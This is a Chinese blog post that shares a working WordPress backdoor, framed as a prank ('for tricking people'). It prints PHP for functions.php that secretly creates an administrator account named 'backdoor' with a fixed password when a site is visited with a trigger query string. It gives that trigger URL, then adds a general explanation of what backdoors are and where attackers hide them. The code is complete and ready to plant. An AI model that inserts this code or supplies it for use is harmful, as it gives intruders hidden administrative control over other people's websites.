坑人专用:分享一段WordPress恶意后门代码

gyue2345·2015-08-17·61 次阅读··

WordPress是目前最大的博客网站建设平台，在全球的网站中有5成以上使用的 WordPress 建站程序。它如此受欢迎，因此它会更加受到不法分子的青睐。

网站帐号被盗，意味着你的网站可能被人利用做各种勾当，而你可能被蒙在鼓里，这个我想大部分人无法接受。作为经常使用WordPress的人可能很清楚，自己的后台经常被各种暴力破解、各种广告垃圾、各种恶意注册，还有经常会发现一些主题插件含有恶意代码。一个简单的 WordPress 后门代码

这是一个简单的 WordPress 后门代码

/**
 *坑人专用:分享一段WordPress恶意后门代码
 *https://www.ljy2345.com/1762.html
*/
add_action( 'wp_head', 'my_backdoor' );

function my_backdoor() {
    if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b'
 ) {
             require( 'wp-includes/registration.php' );
             if ( !username_exists( 'backdoor' ) ) {
                 $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); 
                 $user = new WP_User( $user_id );
                 $user->set_role( 'administrator' ); 
             }
     }
}

把它放在 functions.php，通过访问http://域名/?backdoor=go就可以创建一个管理员的帐号。这个够坑吧，呵呵

那么到底什么是后门？

（以下内容来自维基百科）

后门程序（ Backdoor ）是指绕开正常验证过程并获得服务器的远程访问权限，且WordPress站点管理员无法立即发现。大部分黑客在攻击站点时都是先上传后门程序，即使管理员发现并删除了这些不良插件，黑客还是能重新获得访问权限的。且后门程序在网站升级中也不会被破坏，除非完全清理干净它，否则用户的网站始终暴露在黑客的攻击之下。

有些简单的后门程序仅仅能创建隐藏的管理员用户名，而更复杂后门程序甚至能让黑客执行任何从浏览器端发送的PHP代码。还有一些有完整用户界面的后门程序，可以让黑客用你的服务器发送电子邮件、执行SQL查询或任何他们想做的事情。

黑客主要会通过主题（漏洞）、插件（漏洞）、上传目录、wp-config.php 文件等等去进行后门程序的安装运行，或者在其他的一些其他文件夹里伪装 Worpdress 文件，让一般人看起来像是 WordPress 本身的文件，当然方法不仅限于此。

历史上的文章

• 2017:  斐讯k2路由器六色循环跑马灯代码-支持华硕 潘多拉( 0)
• 2017:  阿里云esc挂载磁盘并设置开机挂载( 0)